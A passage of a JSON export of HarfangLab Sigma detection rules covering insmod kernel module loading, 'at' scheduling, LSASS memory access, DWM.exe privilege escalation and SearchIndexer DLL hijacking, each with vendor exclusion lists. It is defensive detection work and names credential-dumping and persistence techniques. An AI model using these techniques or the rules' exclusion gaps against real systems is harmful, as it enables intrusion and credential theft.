HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.006\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Rootkit.Generic\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # insmod /root/my_malicious_malware.ko\n # insmod -- /root/my_malicious_malware.ko\n selection:\n Image|endswith: '/kmod'\n CommandLine|contains: 'insmod '\n\n # help and version\n exclusion_options_args:\n CommandLine|contains:\n - ' -h'\n - ' -V'\n - ' --help'\n - ' --version'\n\n exclusion_trendmicro:\n CommandLine:\n - 'insmod /opt/ds_agent/*/*.ko'\n - 'insmod /opt/TrendMicro/vls_agent/*/*.ko'\n\n # exclusion_package_manager:\n # TODO: Ancestors\n # # Yum\n # Ancestors|startswith: '/usr/bin/bash|/usr/bin/bash|/usr/libexec/platform-python*|/usr/libexec/platform-python*|'\n\n exclusion_kpatch:\n CommandLine:\n - 'insmod /var/lib/kpatch/*/livepatch-*.ko'\n - 'insmod /var/lib/kpatch/*/kpatch-*.ko'\n\n exclusion_symantec:\n CommandLine: '/sbin/insmod /opt/Symantec/autoprotect/.symevrm-custom-*.ko'\n\n exclusion_veeam:\n ProcessGrandparentImage: '/usr/sbin/veeamworker'\n\n exclusion_commvault:\n - ProcessCommandLine: 'insmod /lib/modules/*/kernel/drivers/*.ko'\n ProcessParentImage: '/opt/commvault/ksh'\n - ProcessGrandparentCommandLine: '/bin/bash /opt/commvault/Base/linux_drv.sh -a /opt/commvault/Base cvblk'\n\n exclusion_quadstorvtl:\n ProcessParentCommandLine: '/bin/bash /quadstorvtl/etc/quadstorvtl.init start'\n\n exclusion_yum_update:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/sh /bin/kernel-install '\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_veritas:\n ProcessCommandLine|startswith:\n - 'insmod /etc/vx/kernel/'\n - 'insmod /opt/VRTSgab/modules/'\n - 'insmod /opt/VRTSamf/modules/'\n - 'insmod /opt/VRTSvxfen/modules/'\n\n # https://github.com/quic/quic-usb-drivers/tree/master\n exclusion_quic:\n - ProcessParentCommandLine: '/bin/bash ./QcDevDriver.sh install'\n - ProcessCurrentDirectory: '/opt/QTI/QUD/BuildPackage/'\n\n exclusion_intel:\n ProcessCurrentDirectory: '/opt/intel/oneapi/vtune/20??.?/sepdk/src/'\n\n exclusion_aws:\n ProcessCommandLine|contains: 'aws-replication-driver.ko'\n ProcessAncestors|contains: '/aws-replication-installer-init|'\n\n exclusion_checkpoint:\n ProcessAncestors|contains: '|/var/lib/checkpoint/cpla/cpla|'\n\n exclusion_guardicore:\n - ProcessCommandLine: 'insmod /var/lib/guardicore/modules/*/gc-enforcement/*/gc-enforcement.ko'\n - ProcessAncestors|contains: '|/var/lib/guardicore/sbin/gc-agents-service|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "050e879b-c3c6-421d-8fc1-c03917f620d2",
"rule_name": "Kernel Module Loaded via Insmod",
"rule_description": "Detects the execution of insmod to load a kernel module manually.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nThey extend the functionality of the kernel without the need to reboot the system.\nFor example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\nAdversaries may modify the kernel to automatically execute programs on system boot.\nIt is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-11-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1547.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612386Z",
"creation_date": "2026-03-23T11:45:34.612389Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612397Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job",
"https://attack.mitre.org/techniques/T1053/002/"
],
"name": "t1053_002_scheduled_job_at.yml",
"content": "title: Job Creation Scheduled via at\nid: 051bcdc2-56be-49af-bd6f-1fbac403ab5b\ndescription: |\n Detects a scheduled job creation using the 'at' utility.\n Contrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\n The new job can be found in the /var/spool/cron/atjobs directory.\n Adversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\n It is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2022/12/26\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.At\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/at'\n - '/batch'\n\n exclusion_not_create:\n CommandLine|contains:\n - ' -l' # lists the user's pending jobs\n - ' -r' # deletes jobs\n - ' -d' # deletes jobs\n\n exclusion_now:\n CommandLine: 'at now'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b",
"rule_name": "Job Creation Scheduled via at",
"rule_description": "Detects a scheduled job creation using the 'at' utility.\nContrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\nThe new job can be found in the /var/spool/cron/atjobs directory.\nAdversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\nIt is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-07-29",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "053fc596-ebe0-4ab6-9d82-691fec399375",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295481Z",
"creation_date": "2026-03-23T11:45:35.295485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295491Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_cleared_process_info_open_lsass.yml",
"content": "title: LSASS Accessed by Process Without PE Metadata Information\nid: 053fc596-ebe0-4ab6-9d82-691fec399375\ndescription: |\n Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\n This can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n It is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\nreferences:\n - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/07\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n ProcessOriginalFileName: ''\n ProcessInternalName: ''\n ProcessLegalCopyright: '' # too many FP with only OriginalFileame and InternalName not set. Generally, LegalCopyright and/or CompanyName is set\n ProcessImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_no_info:\n # In case the agent doesn't know the process info.\n ProcessImphash: '00000000000000000000000000000000'\n\n # Lot of softwares (including Microsoft owns one) do read the image path off the PEB. (inside _RTL_USER_PROCESS_PARAMETERS)\n # This is usually to grab the proces list.\n exclusion_signed_peb_read:\n ProcessSigned: 'true'\n GrantedAccess:\n - '0x1010'\n - '0x1410'\n exclusion_waptpython:\n # WAPT is an open source management tool in python that is unsigned.\n CallTrace|contains: 'python27.dll'\n ProcessProcessName: 'waptpython.exe'\n GrantedAccess: '0x1410'\n exclusion_trendmicro:\n # Trend Micro have a lot of different apps.\n ProcessSignature: 'Trend Micro, Inc.'\n exclusion_synology:\n # Some of their software use an have expired certificate.\n #CallTrace|contains: 'UsbClientService.exe'\n #ProcessProcessName: 'UsbClientService.exe'\n # seen versions from 2011 without signature or any internal name, and no usbclientservice.exe occurences in the callstack\n ProcessImage: '?:\\Program Files (x86)\\Synology\\Assistant\\UsbClientService.exe'\n #ProcessSignature: 'Synology Inc.'\n GrantedAccess: '0x1410'\n exclusion_dell_sre:\n CallTrace|contains: 'ProcBy.dll'\n ProcessProcessName: 'SRE.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sutherland Global Services Inc'\n - 'Sutherland Global Services Private Limited'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n exclusion_g:\n CallTrace|contains: 'nfapi.dll'\n ProcessProcessName: 'DnsCloudClientHost64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'G DATA Software AG'\n - 'G DATA CyberDefense AG'\n GrantedAccess: '0x1f3fff'\n exclusion_conexant_universal_device_install_uninstall:\n CallTrace|contains: 'KUIU.EXE'\n ProcessProcessName: 'KUIU.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Conexant Systems, Inc.'\n GrantedAccess: '0x12f4d0'\n exclusion_rsa_net_witness:\n CallTrace|contains: 'NWEAgent.exe'\n ProcessProcessName: 'NWEAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'RSA Security LLC'\n GrantedAccess: '0x1fffff'\n exclusion_adobe_arm:\n ProcessProcessName: 'AdobeARMHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Systems, Incorporated'\n - 'Adobe Inc.'\n exclusion_alibaba_uninstaller:\n ProcessImage|endswith: '\\Uninstall.exe'\n ProcessSignature: 'Alibaba (China) Network Technology Co.,Ltd.'\n GrantedAccess: '0x12f4d0'\n exclusion_iobit_setup:\n ProcessSignature: 'IObit CO., LTD'\n ProcessDescription: 'Setup/Uninstall'\n GrantedAccess: '0x12f4d0'\n exclusion_oxalys_tools:\n ProcessImage|endswith:\n - '\\OXATOOLS.exe'\n - '\\oxatools64.exe'\n ProcessCompany:\n - 'Oxalys Technologies'\n - 'Oxalys'\n ProcessDescription:\n - 'OXATOOLS'\n - 'Oxatools 64'\n ProcessProduct:\n - 'OXATOOLS'\n - 'OXATOOLS64'\n GrantedAccess: '0x1410'\n exclusion_ossec:\n CallTrace|contains|all:\n - 'ossec-agent'\n - 'ossec-agent.exe'\n ProcessProcessName: 'ossec-agent.exe'\n GrantedAccess: '0x1fffff'\n exclusion_wazuh:\n - ProcessImage: '?:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe'\n - ProcessProcessName: 'ossec-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Wazuh, Inc'\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n exclusion_ocssetup:\n ProcessProcessName: 'OcsSetup.exe'\n ProcessDescription: 'OCS Inventory NG Agent'\n exclusion_cyland_pos_service:\n ProcessProcessName: 'PosService.exe'\n ProcessCompany: 'Cylande'\n GrantedAccess: '0x1410'\n exclusion_seiko_epson_escsvc64:\n ProcessProcessName: 'escsvc64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n GrantedAccess: '0x101410'\n exclusion_google_update:\n # for instance, ..C:\\Program Files (x86)\\Google\\Temp\\GUM8660.tmp\\goopdate.dll+16b4e..\n # to handle chrome installed in user appdata, match only on google\\temp\n GrantedAccess: '0x1410'\n CallTrace: '*\\Google\\Temp\\GUM????.tmp\\goopdate.dll*'\n exclusion_adobe:\n # C:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\customhook\\CoreSyncCustomHook.exe\n # C:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\customhook\\CoreSyncCustomHook.exe\n ProcessImage:\n - '?:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\\\*'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\\\*'\n\n exclusion_battleeye:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\BattlEye\\BEService.exe'\n\n exclusion_symantec:\n ProcessImage: '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\bin\\SysUtil.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_windev_32bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std.DLL'\n # WinDev 26 VM\n - 'wd260vm.DLL'\n\n exclusion_windev_64bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std64.DLL'\n # WinDev 26 VM\n - 'wd260vm64.DLL'\n\n exclusion_easeus:\n ProcessImage:\n - '?:\\Program Files (x86)\\EaseUS\\Todo Backup\\bin\\TodoBackupService.exe'\n - '?:\\Program Files (x86)\\EaseUS\\ENS\\ensserver.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n\n exclusion_watchguard:\n ProcessImage: '?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\WatchGuard\\WatchGuard Mobile VPN with SSL\\wgsslvpnsrc.exe'\n\n exclusion_writedescexecutefilename:\n # C:\\Windows\\Temp\\{368361DA-CBF9-4A07-90CB-2CFF91E36DCC}\\WriteDescExecuteFileName.exe\n ProcessImage: '*\\WriteDescExecuteFileName.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Samsung Electronics CO., LTD.'\n GrantedAccess: '0x153b'\n\n exclusion_xerox:\n ProcessImage: '?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe'\n CallTrace|contains: '|?:\\Xerox\\Docushare\\IDOLServer\\IDOL\\AutonomyIDOLServer.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_metricbeat:\n ProcessImage: '?:\\Program Files\\Metricbeat\\metricbeat.exe'\n ProcessCompany: ''\n ProcessDescription: ''\n ProcessProduct: ''\n CallTrace|contains: '|?:\\Program Files\\Metricbeat\\metricbeat.exe+?????'\n GrantedAccess: '0x1010'\n\n exclusion_zabbix:\n ProcessImage|endswith: '\\zabbix_agentd.exe'\n CallTrace|endswith:\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????|?:\\Windows\\System32\\kernel32.dll+????|?:\\Windows\\System32\\ntdll.dll+?????'\n - '\\zabbix_agentd.exe+?????'\n GrantedAccess: '0x1410'\n\n exclusion_oracle_rman:\n ProcessImage|endswith: '\\app\\product\\\\*\\dbhome\\bin\\rman.exe'\n\n exclusion_oracle_dll:\n GrantedAccess: '0x1410'\n # d:\\oracle\\product\\12.2.0\\client_1\\bin\\orannzsbb12.dll\n # E:\\oracle\\product\\12.2.0\\cl32\\bin\\orannzsbb12.dll+\n # E:\\Oracle_client19\\product\\19.0.0\\client_1\\bin\\orannzsbb19.dll\n CallTrace|contains:\n - '\\bin\\orannzsbb??.dll'\n - '\\bin\\oracrf??.dll'\n - '\\bin\\oracore??.dll'\n\n exclusion_xampp:\n # C:\\xampp\\xampp-control.exe\n # no PE metadata information so we must use the SHA256\n ProcessSha256: '1400812815452aa93ab1e051b11f8062ace7bc95e50a91cc3479ba64ed847dde'\n\n exclusion_manageengine:\n ProcessImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\appctrl\\bin\\VerifyTrustedFiles.exe'\n\n exclusion_nagios:\n ProcessImage: '?:\\Program Files (x86)\\Nagios\\NCPA\\ncpa_passive.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Nagios\\NCPA\\python27.dll+'\n\n exclusion_hewlett_packard:\n ProcessImage: '?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n\n exclusion_streaming_runtime:\n ProcessImage: '?:\\Program Files\\Streaming Runtime Service\\pxr_srs_launcher.exe'\n CallTrace|contains: '|?:\\Program Files (x86)\\Hewlett-Packard\\Library and Tape Tools WebGUI\\bin\\DeviceAnalysisService.exe+'\n GrantedAccess: '0x1fffff'\n ProcessSigned: 'true'\n ProcessSignature: 'Qingdao Pico Technology Co.,Ltd.'\n\n exclusion_watchguard_2:\n ProcessImage: '?:\\WatchGuard\\wgsslvpnsrc.exe'\n CallTrace|contains: '|?:\\WatchGuard\\wgsslvpnsrc.exe+'\n GrantedAccess: '0x1f3fff'\n ProcessSigned: 'true'\n ProcessSignature: 'WatchGuard Technologies'\n\n exclusion_moneweb:\n ProcessImage|endswith: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe'\n CallTrace|contains: '\\Moneweb\\GoldenGatesrvmweb_??\\mgr.exe+'\n GrantedAccess: '0x1410'\n\n exclusion_equitrac:\n ProcessImage: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar_port.exe'\n CallTrace|contains: '?:\\Program Files\\Equitrac\\Shared Services\\Caching\\bin\\sigar.dll'\n\n exclusion_mactype:\n ProcessImage: '?:\\program files\\mactype\\mt64agnt.exe'\n\n exclusion_svc_mgr_alcatel:\n ProcessImage: '?:\\8770\\bin\\svc_mgr.exe'\n\n exclusion_kill_ciril:\n ProcessImage|endswith:\n - '\\ciril\\prod\\util_unix\\kill.exe'\n - '\\ciril\\prod\\util_unix\\pskill.exe'\n - '\\ciril\\prod\\utilitaires\\expl\\kill_processus.exe'\n - '\\ciril\\net\\cgi-bin\\document.exe'\n - '\\ciril\\net\\cgi-bin\\irename.exe'\n - '\\ciril\\net\\cgi-bin\\lirepjfaccpp.exe'\n\n exclusion_hardis_saas:\n ProcessImage: '?:\\hardis\\saas-mgr\\saas-mgr.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_appdynamics:\n ProcessImage: '?:\\ProgramData\\AppDynamics\\agents\\machineagent\\bin\\MachineAgentService.exe'\n ProcessGrandparentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_rufus:\n ProcessProcessName: 'rufus-?.?.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Akeo Consulting'\n GrantedAccess: '0x1450'\n\n exclusion_nokia_vitalsuite:\n ProcessImage|endswith:\n - '\\VSCommon\\Program\\vnStatusKill.exe'\n - '\\VitalNet\\Program\\aggrun.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "053fc596-ebe0-4ab6-9d82-691fec399375",
"rule_name": "LSASS Accessed by Process Without PE Metadata Information",
"rule_description": "Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\nThis can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nIt is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\n",
"rule_creation_date": "2021-06-07",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0551aa79-1306-43bb-9b6d-df4f7837d107",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596475Z",
"creation_date": "2026-03-23T11:45:34.596485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596500Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/dez_/status/1790807116363481415",
"https://securelist.com/cve-2024-30051/112618/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_dwm_launch_process.yml",
"content": "title: Suspicious Child Process Launched by DWM.exe\nid: 0551aa79-1306-43bb-9b6d-df4f7837d107\ndescription: |\n Detects a suspicious process launched by dwm.exe.\n Adversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\n It is recommended to check actions made by the newly created process for suspicious activity.\nreferences:\n - https://x.com/dez_/status/1790807116363481415\n - https://securelist.com/cve-2024-30051/112618/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/07/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2024-30051\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\dwm.exe'\n\n filter_known_children:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\ISM.exe'\n - '?:\\Windows\\System32\\dwm.exe'\n - '?:\\Windows\\System32\\dgcvideo.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0551aa79-1306-43bb-9b6d-df4f7837d107",
"rule_name": "Suspicious Child Process Launched by DWM.exe",
"rule_description": "Detects a suspicious process launched by dwm.exe.\nAdversaries have been observed exploiting vulnerabilities in DWM in order to escalate privileges. As result of a successful exploitation, the DWM.exe process launch a child process with System privileges.\nIt is recommended to check actions made by the newly created process for suspicious activity.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05797331-a902-41f3-8dd3-3e0f5cc17d73",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595136Z",
"creation_date": "2026-03-23T11:45:34.595139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595147Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_searchindexer.yml",
"content": "title: DLL Hijacking via SearchIndexer.exe\nid: 05797331-a902-41f3-8dd3-3e0f5cc17d73\ndescription: |\n Detects potential Windows DLL Hijacking via SearchIndexer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SearchIndexer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msftedit.dll'\n - '\\mstracer.dll'\n - '\\msfte.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05797331-a902-41f3-8dd3-3e0f5cc17d73",
"rule_name": "DLL Hijacking via SearchIndexer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SearchIndexer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
